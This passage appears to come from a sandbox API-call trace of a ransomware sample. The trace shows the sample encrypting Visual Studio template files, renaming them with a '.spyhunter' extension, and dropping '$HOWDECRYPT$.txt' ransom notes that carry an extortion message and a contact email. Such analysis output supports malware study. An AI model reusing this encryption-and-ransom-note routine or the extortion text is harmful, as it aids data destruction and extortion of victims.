lpNewFilePointer=0xffffffff) returned 1 [0165.129] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x514, lpNumberOfBytesWritten=0x248e694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e694*=0x514, lpOverlapped=0x0) returned 1 [0165.129] GetProcessHeap () returned 0x2c0000 [0165.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.130] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.130] WriteFile (in: hFile=0x178, lpBuffer=0x248e6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e694, lpOverlapped=0x0 | out: lpBuffer=0x248e6d4*, lpNumberOfBytesWritten=0x248e694*=0x4, lpOverlapped=0x0) returned 1 [0165.130] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e694, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e694*=0x30, lpOverlapped=0x0) returned 1 [0165.130] CloseHandle (hObject=0x178) returned 1 [0165.130] GetProcessHeap () returned 0x2c0000 [0165.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0165.130] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip.spyhunter") returned 119 [0165.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip.spyhunter")) returned 1 [0165.131] GetProcessHeap () returned 0x2c0000 [0165.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.131] GetProcessHeap () returned 0x2c0000 [0165.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.132] GetProcessHeap () returned 0x2c0000 [0165.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac620 | out: hHeap=0x2c0000) returned 1 [0165.132] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6d0 | out: pbBuffer=0x248e6d0) returned 1 [0165.132] GetProcessHeap () returned 0x2c0000 [0165.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.132] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6c8*=0x30) returned 1 [0165.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.133] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip") returned 118 [0165.133] StrStrW (lpFirst="EmptyDatabase.zip", lpSrch=".txt") returned 0x0 [0165.133] GetProcessHeap () returned 0x2c0000 [0165.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.133] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e68c*=0x35b, lpOverlapped=0x0) returned 1 [0165.135] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffca5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.135] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x248e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e68c*=0x35b, lpOverlapped=0x0) returned 1 [0165.135] GetProcessHeap () returned 0x2c0000 [0165.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.135] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.135] WriteFile (in: hFile=0x178, lpBuffer=0x248e6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e68c, lpOverlapped=0x0 | out: lpBuffer=0x248e6cc*, lpNumberOfBytesWritten=0x248e68c*=0x4, lpOverlapped=0x0) returned 1 [0165.135] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e68c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e68c*=0x30, lpOverlapped=0x0) returned 1 [0165.135] CloseHandle (hObject=0x178) returned 1 [0165.136] GetProcessHeap () returned 0x2c0000 [0165.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0165.136] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip.spyhunter") returned 128 [0165.136] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip.spyhunter")) returned 1 [0165.137] GetProcessHeap () returned 0x2c0000 [0165.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.137] GetProcessHeap () returned 0x2c0000 [0165.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.137] GetProcessHeap () returned 0x2c0000 [0165.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87f28 | out: hHeap=0x2c0000) returned 1 [0165.137] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6d0 | out: pbBuffer=0x248e6d0) returned 1 [0165.137] GetProcessHeap () returned 0x2c0000 [0165.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.137] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6c8*=0x30) returned 1 [0165.137] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.139] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip") returned 111 [0165.139] StrStrW (lpFirst="Dialog.zip", lpSrch=".txt") returned 0x0 [0165.139] GetProcessHeap () returned 0x2c0000 [0165.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.139] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e68c*=0x7f4, lpOverlapped=0x0) returned 1 [0165.299] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff80c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.299] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x7f4, lpNumberOfBytesWritten=0x248e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e68c*=0x7f4, lpOverlapped=0x0) returned 1 [0165.299] GetProcessHeap () returned 0x2c0000 [0165.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.299] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.299] WriteFile (in: hFile=0x178, lpBuffer=0x248e6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e68c, lpOverlapped=0x0 | out: lpBuffer=0x248e6cc*, lpNumberOfBytesWritten=0x248e68c*=0x4, lpOverlapped=0x0) returned 1 [0165.300] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e68c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e68c*=0x30, lpOverlapped=0x0) returned 1 [0165.300] CloseHandle (hObject=0x178) returned 1 [0165.307] GetProcessHeap () returned 0x2c0000 [0165.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0165.307] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip.spyhunter") returned 121 [0165.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip.spyhunter")) returned 1 [0165.308] GetProcessHeap () returned 0x2c0000 [0165.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0165.308] GetProcessHeap () returned 0x2c0000 [0165.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.308] GetProcessHeap () returned 0x2c0000 [0165.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac4f8 | out: hHeap=0x2c0000) returned 1 [0165.309] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6c8 | out: pbBuffer=0x248e6c8) returned 1 [0165.309] GetProcessHeap () returned 0x2c0000 [0165.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.309] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6c0*=0x30) returned 1 [0165.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.310] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip") returned 125 [0165.310] StrStrW (lpFirst="AssemblyInfoInternal.zip", lpSrch=".txt") returned 0x0 [0165.310] GetProcessHeap () returned 0x2c0000 [0165.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.310] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e684, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e684*=0x485, lpOverlapped=0x0) returned 1 [0165.312] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.312] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x248e684, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e684*=0x485, lpOverlapped=0x0) returned 1 [0165.312] GetProcessHeap () returned 0x2c0000 [0165.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.312] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.312] WriteFile (in: hFile=0x178, lpBuffer=0x248e6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e684, lpOverlapped=0x0 | out: lpBuffer=0x248e6c4*, lpNumberOfBytesWritten=0x248e684*=0x4, lpOverlapped=0x0) returned 1 [0165.312] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e684, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e684*=0x30, lpOverlapped=0x0) returned 1 [0165.312] CloseHandle (hObject=0x178) returned 1 [0165.312] GetProcessHeap () returned 0x2c0000 [0165.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0165.313] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip.spyhunter") returned 135 [0165.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip.spyhunter")) returned 1 [0165.314] GetProcessHeap () returned 0x2c0000 [0165.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0165.314] GetProcessHeap () returned 0x2c0000 [0165.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.314] GetProcessHeap () returned 0x2c0000 [0165.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7700 | out: hHeap=0x2c0000) returned 1 [0165.314] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6c8 | out: pbBuffer=0x248e6c8) returned 1 [0165.314] GetProcessHeap () returned 0x2c0000 [0165.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.314] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6c0*=0x30) returned 1 [0165.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.315] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip") returned 129 [0165.315] StrStrW (lpFirst="AppConfigurationInternal.zip", lpSrch=".txt") returned 0x0 [0165.315] GetProcessHeap () returned 0x2c0000 [0165.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.315] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e684, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e684*=0x45d, lpOverlapped=0x0) returned 1 [0165.396] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffba3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.396] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x248e684, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e684*=0x45d, lpOverlapped=0x0) returned 1 [0165.397] GetProcessHeap () returned 0x2c0000 [0165.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.397] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.397] WriteFile (in: hFile=0x178, lpBuffer=0x248e6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e684, lpOverlapped=0x0 | out: lpBuffer=0x248e6c4*, lpNumberOfBytesWritten=0x248e684*=0x4, lpOverlapped=0x0) returned 1 [0165.397] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e684, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e684*=0x30, lpOverlapped=0x0) returned 1 [0165.397] CloseHandle (hObject=0x178) returned 1 [0165.471] GetProcessHeap () returned 0x2c0000 [0165.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.471] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip.spyhunter") returned 139 [0165.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip.spyhunter")) returned 1 [0165.473] GetProcessHeap () returned 0x2c0000 [0165.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.473] GetProcessHeap () returned 0x2c0000 [0165.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.473] GetProcessHeap () returned 0x2c0000 [0165.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec75b0 | out: hHeap=0x2c0000) returned 1 [0165.474] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.474] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0165.474] WriteFile (in: hFile=0x178, lpBuffer=0x248e5f7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e720, lpOverlapped=0x0 | out: lpBuffer=0x248e5f7*, lpNumberOfBytesWritten=0x248e720*=0x127, lpOverlapped=0x0) returned 1 [0165.475] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0165.475] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e720, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e720*=0x2ac, lpOverlapped=0x0) returned 1 [0165.476] CloseHandle (hObject=0x178) returned 1 [0165.476] GetProcessHeap () returned 0x2c0000 [0165.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac2a8 | out: hHeap=0x2c0000) returned 1 [0165.476] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.477] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0165.477] WriteFile (in: hFile=0x178, lpBuffer=0x248e5f3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x248e5f3*, lpNumberOfBytesWritten=0x248e71c*=0x127, lpOverlapped=0x0) returned 1 [0165.478] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0165.478] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e71c*=0x2ac, lpOverlapped=0x0) returned 1 [0165.479] CloseHandle (hObject=0x178) returned 1 [0165.479] GetProcessHeap () returned 0x2c0000 [0165.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87cb8 | out: hHeap=0x2c0000) returned 1 [0165.479] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6b8 | out: pbBuffer=0x248e6b8) returned 1 [0165.479] GetProcessHeap () returned 0x2c0000 